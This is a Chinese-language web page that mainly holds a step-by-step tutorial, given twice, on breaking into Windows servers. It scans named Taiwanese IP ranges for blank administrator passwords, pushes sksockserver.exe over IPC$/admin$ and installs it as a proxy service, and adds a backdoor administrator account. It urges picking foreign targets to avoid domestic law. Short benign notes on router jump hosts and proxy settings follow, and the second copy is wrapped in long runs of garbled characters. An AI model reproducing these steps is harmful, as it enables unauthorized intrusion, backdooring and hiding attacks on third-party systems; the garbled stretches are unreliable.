『壹』 埠掃描、跳板的詳細教程!
特別提醒:千萬不要做國內的主機啊!做日本或者阿扁(台灣)吧,這樣既不違反 我們國家的法律,也體現了自己的愛國心,哈哈(摘錄別人的話),不過最好還是老老實實的做跳板,不要總是去想著做什麼壞事。 千萬不要用國內的主機做試驗啊,否則等著警車來接你啦 怎樣製作代理跳板 說明:(1)這篇文章是我自己做跳板的一點體會,是些給那些從來沒有做過跳板的網友看的。做過跳板的網友就不用看了。 (2)本文講述的是做跳板最簡單,最基礎的方法,僅僅是給新手提供一個思路,一些稍微復雜的方法比如unicode,CGI等等這里不講。 (3)做跳板畢竟算是一種入侵行為,有了跳板和肉雞以後,千萬要用在該用的地方,不要刻意去「黑「別人啊!! 准備工作: 做一件事情,至少需要兩個方面的准備工作:相關的基礎知識和做這件事情的工具。 基本的工具:(1)x-scan v1.3:強大的漏洞掃描工具,對於初學者來說非常好的一個工具。我們主要用他來掃描一些基本的漏洞(主要是NT弱密碼),用法在後面會具體說。(其實流光很不錯的,但是我覺得流光再掃NT弱密碼的時候太煩了) (2)superscan:非常快速的埠掃描工具,可以在很短的時間里發現某個IP域上IP的分布。為什麼用他呢?主要是避免盲目掃描,提高效率:某個 IP域上IP地址的分布不是連續的,也許他從xxx.xxx.0.0-xxx.xxx.50.255上每個IP都是有計算機存在的,而從 xxx.xxx.51.0- xxx.xxx.100.255每個IP都沒有計算機存在。如果你事先不知道這一段上根本沒有主機的話,花了很長時間去掃描也不會有結果,浪費時間和金錢 啊。 (3)fluxay 4.0:大名鼎鼎的掃描工具,我們主要用它的NT管道命令功能來連接目標主機,以及添加用戶、遠程啟動服務等。注意了:最好是fluxay 4.0版本。 (4)windows2000下的c:\命令提示符工具:也就是說,跳板的製作至少是要在windows2000以上的操作系統下進行。 (5)sksockserver.exe:做跳板的主角,就是用它來實現遠程主機的socks5代理功能的。 (6)全球IP地址分配表:這個對於高手來說是不必要的,用他的目的是考慮到很多以前沒有做過跳板的網友對IP的分布不了解,我們主要的目標還是國外的主 機,因此對國外的IP分布有一些了解是很重要的,也是以後我們選定所要掃描的IP域的主要根據。這樣的話,就省得再去用「追捕」軟體查找IP的實際所在地 了。 好了工具准備完了,現在了解一下做跳板的大概過程。 注意:剛才你下載的這些東東不是放在你的硬碟上!放在什麼地方呢?放在「肉雞」上! 就是說我們做跳板的過程是在肉雞上完成的。 名詞解釋肉雞:肉雞是開了3389埠微軟終端服務(microsoft terminal service),又有弱密碼的高速伺服器,俗稱「肉雞」。我們之所以要在肉雞上做,是出於安全考慮,因為做跳板畢竟是一種非法入侵行為,我們需要隱藏自 己的蹤跡,當然,不想用肉雞也可以,前提是你有足夠的帶寬,而且不怕公安上門找你麻煩。(當然,進入肉雞本身也是一種非法的入侵)。我們用 mstsc.exe這個軟體登陸上肉雞,就可以像平時我們在自己電腦上一樣用滑鼠控制遠程的伺服器(也就是肉雞)做我們要做的事情。 過程:為了敘述的方便,先假設我們已經有了一個肉雞。下面的步驟沒有特殊說明都是在「肉 雞」上完成的。 (1) 先在自己的機器上打開全球IP地址分配表,選取一個IP區域 (2) 登陸上肉雞,把剛才說到的工具在肉雞上下載好,就用肉雞自己的IE下載就行了。 (3) 主要的過程是:先用superscan掃描(1)選定的IP區域,找到其中一個IP很集中的區域,然後放到x-scan進行漏洞掃描(因為是面對以前沒有 做過跳板的網友,所以這里只介紹用NT弱密碼製作跳板),找到若干個有弱密碼的IP,把sksockserver.exe上傳到目標主機上,然後遠程啟動 sksockserver。這樣,跳板就做好了。 我們一起來實踐一下,做一個跳板: (1) 剛才說過了,沒有肉雞做跳板是不行的,尤其是撥號上網的網友(速度慢)。我們首先登陸上一個已經知道的肉雞:xxx.xxx.xxx.xxx。幫剛才上面 提到的東東都准備好。最好是集中放置,這樣便於我們使用。不要到處亂放,否則主人一進來就知道有人進過他的機器。 (2) 我們選擇210.85.0.0-210.85.50.255這一段IP(台灣),放在superscan裡面去,把superscan的埠設置改成只有 80一個埠,然後確定,開始掃描。這時,在下面的輸出框裡面,就會出現一大批的活躍IP,看見了嗎?210.85.0.0-210.85.40.255 這一段上都是活躍的IP。現在我們隨便選一個IP區域,比如我們就選210.85.0.0-210.85.5.255這一段,不要太長,因為下一步我們要 把他們放進x-scan進行掃描,x-scan掃描速度並不是很快,太多的話,會降低效率,而且IP區域過長的話,有可能使x-scan出現誤報。 x-scan的使用方法這里就不詳細敘述了這里要做的就是:在「設置」菜單里,先選「掃描模塊」,選擇「開放埠」和「NT弱密碼」兩個選項,在「掃描參 數」里,填上我們剛才選定的IP范圍:210.85.0.0-210.85.5.255,接著,在其中「埠相關設置」里,把原先一長串的埠去掉,只填 上80,3389兩個埠,其他的設置就用默認的好了,不用再改了。然後就開始搜索,這需要大概你8、9分鍾的時間(因為x-scan雖然簡單,但是速度慢),這段時間你大可以做一點自己的其他事情,等時間差不多了,你再看看x-scan裡面的結果:好的,N個機器的密碼為空,這下子有收獲了!但是要說的 是,x-scan有一些誤報,大家一定要有耐心去試啊! (3) 我們隨便從中間隨便選了一個,比如:210.85.0.14:administrator 空。接下來的事情, 是要驗證它到底接不接受我們的連接,密碼是不是正確。現在用到流光了,打開流光,選擇「工具」裡面的「NT管道遠程命令」,出現對話框,把剛才的IP,用戶名,密碼填進去,然後回車。在界面上「NTCMD>」提示符後面打入CMD,連接成功,屏幕上出現了「C:\WINNT\ SYSTEM32>」的提示符。這證明,剛才的用戶名和密碼是正確的,這台機器已經基本是你的了。好了,我們進去了,想想我們要做什麼呢?對了,是做跳板,我們還要把sksockserver.exe放到210.85.0.14上,這樣才能啟動服務,讓這台機器做為跳板!怎麼把這個東東放上去呢: 調出肉雞上的CMD,在命令提示符下按下面的方法做: c:\net use \\210.85.0.14\ipc$ 「」/user:「administrator」(建立IPC連接) 系統提示:命令成功完成。 Copy c:\sksockserver.exe \\210.85.0.14\admin$ 系統提示:成功復制一個文件。 這樣我們就成功地把sksockserver.exe傳到了目標主機上。接下來的任務就是把他遠程啟動就行了。 我們又回到剛才流光的NTCMD里,在提示符下按下面的方法做: c:\sksockserver –install 系統提示:snake sockproxy service installed c:\sksockserver –config port 1949(埠自己來定,這里的1949是隨便選的) 系統提示:the port value have set to 1949 c:\sksockserver –config starttype 2 系統提示:the starttype have set to 2---auto c:\net start skserver 系統提示服務啟動成功。 這個時候,這台機器已經成為你的跳板了。 下面簡單的說一說自己找肉雞的方法。 工具:(1)sockscap:強大的socks代理調度軟體。 (2)snake的代理跳板GUI(圖形界面程序) (3)mstsc:微軟terminal service終端服務的客戶端程序。用於登陸3389肉 雞。有了它,我們就可以象控制自己的機器一樣控制終端伺服器,做我們的事情了。 其實前面兩個都是附屬的工具,只有mstsc才是真正唱主角的。 Sockscap和sksockserver GUI配合實現實現跳板的使用,可以隱藏我們的 入侵痕跡。 我們現在還沒有肉雞,那麼一切事情都只能在我們自己的機器上做了,如果你不放心的話 可以到網吧去做下面的事情。 但是,要提醒的是,千萬不要做國內的主機啊!做日本或者阿扁(台灣)吧,這樣既不違反 我們國家的法律,也體現了自己的愛國心,哈哈(摘錄別人的話),不過最好還是老老實實 的做跳板,不要總是去想著做什麼壞事。 步驟其實跟做跳板也很相似的。剛才我們在x-scan搜索的埠里設置了3389,如果一台機 器開了3389埠,而且有了弱密碼的話,那這樣的機器就是所謂的「肉雞」了。(當然輸入 法漏洞有的時候也可以做成肉雞,但是畢竟現在有輸入法漏洞的機器太少了,遠遠不及有弱 密碼的終端伺服器那麼多,所以我們還是選擇了後者,而且輸入法漏洞只適合國內機器。一 個一個去試驗,真是太浪費時間了!會煩死的。) 具體搜索過程跟剛才在作跳板里是一樣的,找到一個開了3389埠服務,而且有弱密碼的 機器。我們在上面搜索的結果中仔細地看看,終於發現了一台:210.85.2.84:frank41:空。而 且開了3389服務。要把這台機器變成自己地機器那肯定要有自己的登錄名,否則每次總是 用別人的,那還怎麼叫是自己的機器?我們現在來為自己添加一個用戶名,把自己提升成為 root許可權,那麼我們就可以做任何事情了。打開流光,選擇「工具」裡面的「NT管道命令」 填上剛才得到的用戶名跟密碼:frank41:空。然後確定,進入NTCMD界面,在提示符下 鍵入:CMD,連接成功以後在系統提示符下如下操作: c:\net user admin /add(添加一個admin用戶) c:\net user admin shonline788(使得admin的密碼是shonline788) c:\net localgroup administrators admin /add(把用戶admin提升為administrator即管理員身份) 這樣我們就成功的在這台機器中取得了root許可權,可以作任何事情了,但是別做壞事噢。 下一步,就要用上我們剛才准備的這些工具了。在網上搞幾個socks代理,把sockscap和 sksockserverGUI設置好,把mstsc的圖標拖到sockscap里去,雙擊mstsc的圖標,在其中填 上你剛才找到的肉雞IP:210.85.2.84,然後回車進行連接。成功以後,會出現一個跟我們平 時登陸windows2000時候一樣的一個藍色的界面,在裡面填上我們剛才添加的用戶名和密 碼,回車登陸。登陸成功以後就會出現該主機的圖形界面,這個時候你就可以象操作自己的 機器一樣,操作別人的機器。至此,你已經獲得了一台肉雞。就可以做我們上面做過的事情 了。
『貳』 路由器跳板功能簡單說明
在某些網路運維的過程中,因為網路設置,源IP不能直接訪問目的IP,這時需要藉助跳板連接目的IP。
路由器的運維管理使用的是SSH和Telnet協議,一方面提升了管理的使得性,另一方面也使路由器變成跳板成為可能。
要完成以上工作,大概需要以下四個步驟。
如果目標終端沒有開放Telnet怎麼辦,以Windows7終端為例,可以通過腳本方式打開Telnet服務
最終,形成「本地」-「跳板終端」-「跳板路由器」-「目標」或者「本地」-「跳板路由器」-「跳板終端」-「目標」連接線路,也就是通常意義上說的「多重跳板」。
這樣,在某些網路不可達的情況下,也能夠實現對設備的遠程運維管理。
『叄』 如何使用代理伺服器上網
1、首先我們點擊電腦的菜單「設置」進入windows管理,如下圖所示。
『肆』 請問上網如何設置跳板和怎麼樣使用免費服務代理器
1要伺服器的IP 2別人安裝代理軟體 ,3就是自己跳下IE的設置了,不要別人的ADSL
『伍』 怎樣製作代理跳板 詳細�0�3
莃薇蚆羆肂 荿螞羆芄蚅薈羅莇蒈褘羄 肆蚃螂羃腿蒆蚈羂芁蟻薄 肁莃蒄袃肀肅芇蝿肀膅蒃 螅聿莈芅蟻肈肇薁薇肇膀 莄褘肆節蕿螁肅莄莂蚇膄 肄薇薃膄嗉莀袂膃荿薆袈 膂蒁葿螄膁膀蚄蝕螈芃蕆 薆螇蒞螞裊螆肅蒅螁裊膇 蟻蚇襖艿蒃薃袃蒂芆羈袂 膁薂袇袂芄蒞螃袁莆薀蠆 袀肆莃薅衿膈薈襖羈芀莁 螿羇莃薇蚆羆肂荿螞羆芄 蚅薈羅莇蒈褘羄肆蚃螂羃 腿蒆蚈羂芁蟻薄肁莃蒄袃 肀肅芇蝿肀膅蒃螅聿莈芅 蟻肈肇薁薇肇膀莄褘肆節 蕿螁肅莄莂蚇膄肄薇薃膄 嗉莀袂膃荿薆袈膂蒁葿 螄膁膀蚄蝕螈芃蕆薆螇蒞 螞裊螆肅蒅螁裊膇蟻蚇襖 艿蒃薃袃蒂芆羈袂膁薂袇 袂芄蒞螃袁莆薀蠆袀肆莃 薅衿膈薈襖羈芀莁螿羇莃 薇蚆羆肂荿螞羆芄蚅薈羅 莇蒈褘羄肆蚃螂羃腿蒆蚈 羂芁蟻薄肁莃蒄袃肀肅芇 蝿肀膅蒃螅聿莈芅蟻肈肇 薁薇肇膀莄褘肆節蕿螁肅 莄莂蚇膄肄薇薃膄嗉莀袂 膃荿薆袈膂蒁葿螄膁膀蚄 蝕螈芃蕆薆螇蒞螞裊螆肅 蒅螁裊膇蟻蚇襖艿蒃薃袃 蒂芆羈袂膁薂袇袂芄蒞螃 袁莆薀蠆袀肆莃薅衿膈薈 襖羈芀莁螿羇莃薇蚆羆肂 荿螞羆芄蚅薈羅莇蒈褘羄 肆蚃螂羃腿蒆蚈羂芁蟻薄 肁莃蒄袃肀肅芇蝿肀膅蒃 螅聿莈芅蟻肈肇薁薇肇膀 莄褘肆節蕿螁肅莄莂蚇膄 肄薇薃膄嗉莀袂膃荿薆袈 膂蒁葿螄膁膀蚄蝕螈芃蕆 薆螇蒞螞裊螆肅蒅螁裊膇 蟻蚇襖艿蒃薃袃蒂芆羈袂 膁薂袇袂芄蒞 螃袁莆薀蠆 怎樣製作代理跳板 特別提醒:千萬不要做國內的主機啊!做日本或者阿扁(台灣)吧,這樣既不違反 我們國家的法律,也體現了自己的愛國心,哈哈(摘錄別人的話),不過最好還是老老實實的做跳板,不要總是去想著做什麼壞事。 千萬不要用國內的主機做試驗啊,否則等著警車來接你啦 怎樣製作代理跳板 說明:(1)這篇文章是我自己做跳板的一點體會,是些給那些從來沒有做過跳板的網友看的。做過跳板的網友就不用看了。 (2)本文講述的是做跳板最簡單,最基礎的方法,僅僅是給新手提供一個思路,一些稍微復雜的方法比如unicode,CGI 等等這里不講。 (3)做跳板畢竟算是一種入侵行為,有了跳板和肉雞以後,千萬要用在該用的地方,不要刻意去「黑「別人啊!! 准備工作: 做一件事情,至少需要兩個方面的准備工作:相關的基礎知識和做這件事情的工具。 基本的工具:(1)x-scan v1.3:強大的漏洞掃描工具,對於初學者來說非常好的一個工具。我們主要用他來掃描一些基本的漏洞(主要是NT 弱密碼),用法在後面會具體說。(其實流光很不錯的,但是我覺得流光再掃NT 弱密碼的時候太煩了) (2)superscan:非常快速的埠掃描工具,可以在很短的時間里發現某個 IP 域上 IP 的分布。為什麼用他呢?主要是避免盲目掃描,提高效率:某個 IP 域上IP 地址的分布不是連續的,也許他從xxx.xxx.0.0-xxx.xxx.50.255 上每個IP 都是有計算機存在的,而從 xxx.xxx.51.0- xxx.xxx.100.255 每個IP 都沒有計算機存在。如果你事先不知道這一段上根本沒有主機的話,花了很長時間去掃描也不會有結果,浪費時間和金錢 啊。 (3)fluxay 4.0:大名鼎鼎的掃描工具,我們主要用它的NT 管道命令功能來連接目標主機,以及添加用戶、遠程啟動服務等。注意了:最好是fluxay 4.0 版本。 (4)windows2000 下的c:\命令提示符工具:也就是說,跳板的製作至少是要在windows2000 以上的操作系統下進行。 (5)sksockserver.exe:做跳板的主角,就是用它來實現遠程主機的socks5 代理功能的。 (6)全球IP 地址分配表:這個對於高手來說是不必要的,用他的目的是考慮到很多以前沒有做過跳板的網友對IP 的分布不了解,我們主要的目標還是國外的主 機,因此對國外的IP 分布有一些了解是很重要的,也是以後我們選定所要掃描的 IP 域的主要根據。這樣的話,就省得再去用「追捕」軟體查找IP 的實際所在地 了。 好了工具准備完了,現在了解一下做跳板的大概過程。 注意:剛才你下載的這些東東不是放在你的硬碟上!放在什麼地方呢?放在「肉雞」上! 就是說我們做跳板的過程是在肉雞上完成的。 名詞解釋肉雞:肉雞是開了3389 埠微軟終端服務(microsoft terminal service),又有弱密碼的高速伺服器,俗稱「肉雞」。我們之所以要在肉雞上做,是出於安全考慮,因為做跳板畢竟是一種非法入侵行為,我們需要隱藏自 己的蹤跡,當然,不想用肉雞也可以,前提是你有足夠的帶寬,而且不怕公安上門找你麻煩。(當然,進入肉雞本身也是一種非法的入侵)。我們用 mstsc.exe 這個軟體登陸上肉雞,就可以像平時我們在自己電腦上一樣用滑鼠控制遠 程的伺服器(也就是肉雞)做我們要做的事情。 過程:為了敘述的方便,先假設我們已經有了一個肉雞。下面的步驟沒有特殊說明都是在「肉 雞」上完成的。 (1) 先在自己的機器上打開全球IP 地址分配表,選取一個IP 區域 (2) 登陸上肉雞,把剛才說到的工具在肉雞上下載好,就用肉雞自己的IE 下載就行了。 (3) 主要的過程是:先用superscan 掃描(1)選定的IP 區域,找到其中一個IP 很集中的區域,然後放到x-scan 進行漏洞掃描(因為是面對以前沒有 做過跳板的網友,所以這里只介紹用NT 弱密碼製作跳板),找到若干個有弱密碼的IP,把sksockserver.exe 上傳到目標主機上,然後遠程啟動 sksockserver。這樣,跳板就做好了。 我們一起來實踐一下,做一個跳板: (1) 剛才說過了,沒有肉雞做跳板是不行的,尤其是撥號上網的網友(速度慢)。我們首先登陸上一個已經知道的肉雞:xxx.xxx.xxx.xxx。幫剛才上面 提到的東東都准備好。最好是集中放置,這樣便於我們使用。不要到處亂放,否則主人一進來就知道有人進過他的機器。 (2) 我們選擇210.85.0.0-210.85.50.255 這一段IP(台灣),放在superscan裡面去,把superscan 的埠設置改成只有 80 一個埠,然後確定,開始掃描。這時,在下面的輸出框裡面,就會出現一大批的活躍 IP,看見了嗎?210.85.0.0-210.85.40.255 這一段上都是活躍的 IP。現在我們隨便選一個IP 區域,比如我們就選210.85.0.0-210.85.5.255 這一段,不要太長,因為下一步我們要 把他們放進x-scan 進行掃描,x-scan 掃描速度並不是很快,太多的話,會降低效率,而且IP 區域過長的話,有可能使x-scan 出現誤報。 x-scan 的使用方法這里就不詳細敘述了這里要做的就是:在「設置」菜單里,先選「掃描模塊」,選擇「開放埠」和「NT 弱密碼」兩個選項,在「掃描參 數」里,填上我們剛才選定的 IP 范圍:210.85.0.0-210.85.5.255,接著,在其中「埠相關設置」里,把原先一長串的埠去掉,只填 上80,3389 兩個埠,其他的設置就用默認的好了,不用再改了。然後就開始搜索,這需要大概你 8、9 分鍾的時間(因為 x-scan 雖然簡單,但是速度慢),這段時間你大可以做一點自己的其他事情,等時間差不多了,你再看看 x-scan 裡面的結果:好的,N 個機器的密碼為空,這下子有收獲了!但是要說的 是,x-scan 有一些誤報,大家一定要有耐心去試啊! (3) 我們隨便從中間隨便選了一個,比如:210.85.0.14:administrator 空。接下來的事情, 是要驗證它到底接不接受我們的連接,密碼是不是正確。現在用到流光了,打開流光,選擇「工具」裡面的「NT管道遠程命令」,出現對話框,把剛才的IP,用戶名,密碼填進去,然後回車。在界面上「NTCMD>」提示符後面打入CMD,連接成功,屏幕上出現了「C: \WINNT\ SYSTEM32>」的提示符。這證明,剛才的用戶名和密碼是正確的,這台機器已經基本是你的了。好了,我們進去了,想想我們要做什麼呢?對了,是做跳板,我們還要把sksockserver.exe 放到210.85.0.14 上,這樣才能啟動服務,讓這台機器做為跳板!怎麼把這個東東放上去呢: 調出肉雞上的CMD,在命令提示符下按下面的方法做: c:\net use \\210.85.0.14\ipc$ 「」/user:「administrator」(建立IPC 連接) 系統提示:命令成功完成。 Copy c:\sksockserver.exe \\210.85.0.14\admin$ 系統提示:成功復制一個文件。 這樣我們就成功地把 sksockserver.exe 傳到了目標主機上。接下來的任務就是把他遠程啟動就行了。 我們又回到剛才流光的NTCMD 里,在提示符下按下面的方法做: c:\sksockserver –install 系統提示:snake sockproxy service installed c:\sksockserver –config port 1949(埠自己來定,這里的1949 是隨便選的) 系統提示:the port value have set to 1949 c:\sksockserver –config starttype 2 系統提示:the starttype have set to 2---auto c:\net start skserver 系統提示服務啟動成功。 這個時候,這台機器已經成為你的跳板了。 下面簡單的說一說自己找肉雞的方法。 工具:(1)sockscap:強大的socks 代理調度軟體。 (2)snake 的代理跳板GUI(圖形界面程序) (3)mstsc:微軟terminal service 終端服務的客戶端程序。用於登陸3389 肉 雞。有了它,我們就可以象控制自己的機器一樣控制終端伺服器,做我們的事情了。 其實前面兩個都是附屬的工具,只有mstsc 才是真正唱主角的。 Sockscap 和sksockserver GUI 配合實現實現跳板的使用,可以隱藏我們的 入侵痕跡。 我們現在還沒有肉雞,那麼一切事情都只能在我們自己的機器上做了,如果你不放心的話 可以到網吧去做下面的事情。 但是,要提醒的是,千萬不要做國內的主機啊!做日本或者阿扁(台灣)吧,這樣既不違反 我們國家的法律,也體現了自己的愛國心,哈哈(摘錄別人的話),不過最好還是老老實實 的做跳板,不要總是去想著做什麼壞事。 步驟其實跟做跳板也很相似的。剛才我們在x-scan 搜索的埠里設置了3389,如果一台機 器開了3389 埠,而且有了弱密碼的話,那這樣的機器就是所謂的「肉雞」了。(當然輸入 法漏洞有的時候也可以做成肉雞,但是畢竟現在有輸入法漏洞的機器太少了,遠遠不及有弱 密碼的終端伺服器那麼多,所以我們還是選擇了後者,而且輸入法漏洞只適合國內機器。一 個一個去試驗,真是太浪費時間了!會煩死的。) 具體搜索過程跟剛才在作跳板里是一樣的,找到一個開了3389 埠服務,而且有弱密碼的 機器。我們在上面搜索的結果中仔細地看看,終於發現了一台:210.85.2.84:frank41:空。而 且開了3389 服務。要把這台機器變成自己地機器那肯定要有自己的登錄名,否則每次總是 用別人的,那還怎麼叫是自己的機器?我們現在來為自己添加一個用戶名,把自己提升成為 root 許可權,那麼我們就可以做任何事情了。打開流光,選擇「工具」裡面的「NT 管道命令」 填上剛才得到的用戶名跟密碼:frank41:空。然後確定,進入NTCMD 界面,在提示符下 鍵入:CMD,連接成功以後在系統提示符下如下操作: c:\net user admin /add(添加一個admin 用戶) c:\net user admin shonline788(使得admin 的密碼是shonline788) c:\net localgroup administrators admin /add(把用戶admin 提升為administrator 即管理員身份) 這樣我們就成功的在這台機器中取得了root 許可權,可以作任何事情了,但是別做壞事噢。 下一步,就要用上我們剛才准備的這些工具了。在網上搞幾個socks 代理,把sockscap 和 sksockserverGUI 設置好,把mstsc 的圖標拖到sockscap 里去,雙擊mstsc 的圖標,在其中填 上你剛才找到的肉雞IP:210.85.2.84,然後回車進行連接。成功以後,會出現一個跟我們平 時登陸windows2000 時候一樣的一個藍色的界面,在裡面填上我們剛才添加的用戶名和密 碼,回車登陸。登陸成功以後就會出現該主機的圖形界面,這個時候你就可以象操作自己的 機器一樣,操作別人的機器。至此,你已經獲得了一台肉雞。就可以做我們上面做過的事情 了。 節蒈螅羈莂薁羈 芆莁蚃螄膂莀螅罿肈荿薅 螂肄莈蚇肈羀莇蝿袀艿莇 葿肆膅莆薁衿肁蒅蚄肄羇 蒄螆袇芆蒃蒆蝕節蒂蚈裊 膈蒁螿螈肄蒁蒀羄羀蒀薂 螆羋葿蚅羂膄薈螇螅肀薇 蕆羀羆薆蕿螃蒞薅螁羈芁 薅袃袁膇薄薃肇肅膀蚅衿 罿腿螈肅芇膈蕆袈膃羋薀 肅聿芇螞褘羅芆襖蠆莄芅 薄羄芀芄蚆螇嗉芃蝿羃肂 節蒈螅羈莂薁羈芆莁蚃螄 膂莀螅罿肈荿薅螂肄莈蚇 肈羀莇蝿袀艿莇葿肆膅莆 薁衿肁蒅蚄肄羇蒄螆袇芆 蒃蒆蝕節蒂蚈裊膈蒁螿螈 肄蒁蒀羄羀蒀薂螆羋葿蚅 羂膄薈螇螅肀薇蕆羀羆薆 蕿螃蒞薅螁羈芁薅袃袁膇 薄薃肇肅膀蚅衿罿腿螈肅 芇膈蕆袈膃羋薀肅聿芇螞 褘羅芆襖蠆莄芅薄羄芀芄 蚆螇嗉芃蝿羃肂節蒈螅羈 莂薁羈芆莁蚃螄膂莀螅罿 肈荿薅螂肄莈蚇肈羀莇蝿 袀艿莇葿肆膅莆薁衿肁蒅 蚄肄羇蒄螆袇芆蒃蒆蝕節 蒂蚈裊膈蒁螿螈肄蒁蒀羄 羀蒀薂螆羋葿蚅羂膄薈螇 螅肀薇蕆羀羆薆蕿螃蒞薅 螁羈芁薅袃袁膇薄薃肇 肅膀蚅衿罿腿螈肅芇膈蕆 袈膃羋薀肅聿芇螞褘羅芆 襖蠆莄芅薄羄芀芄蚆螇嗉 芃蝿羃肂節蒈螅羈莂薁羈 芆莁蚃螄膂莀螅罿肈荿薅 螂肄莈蚇肈羀莇蝿袀艿莇 葿肆膅莆薁衿肁蒅蚄肄羇 蒄螆袇芆蒃蒆蝕節蒂蚈裊 膈蒁螿螈肄蒁蒀羄羀蒀薂螆羋葿 蚅羂膄薈螇螅肀薇蕆羀羆 薆蕿螃蒞薅螁羈芁薅袃袁 膇薄薃肇肅膀蚅衿罿腿螈 肅芇膈蕆袈膃羋薀肅聿芇 螞褘羅芆襖蠆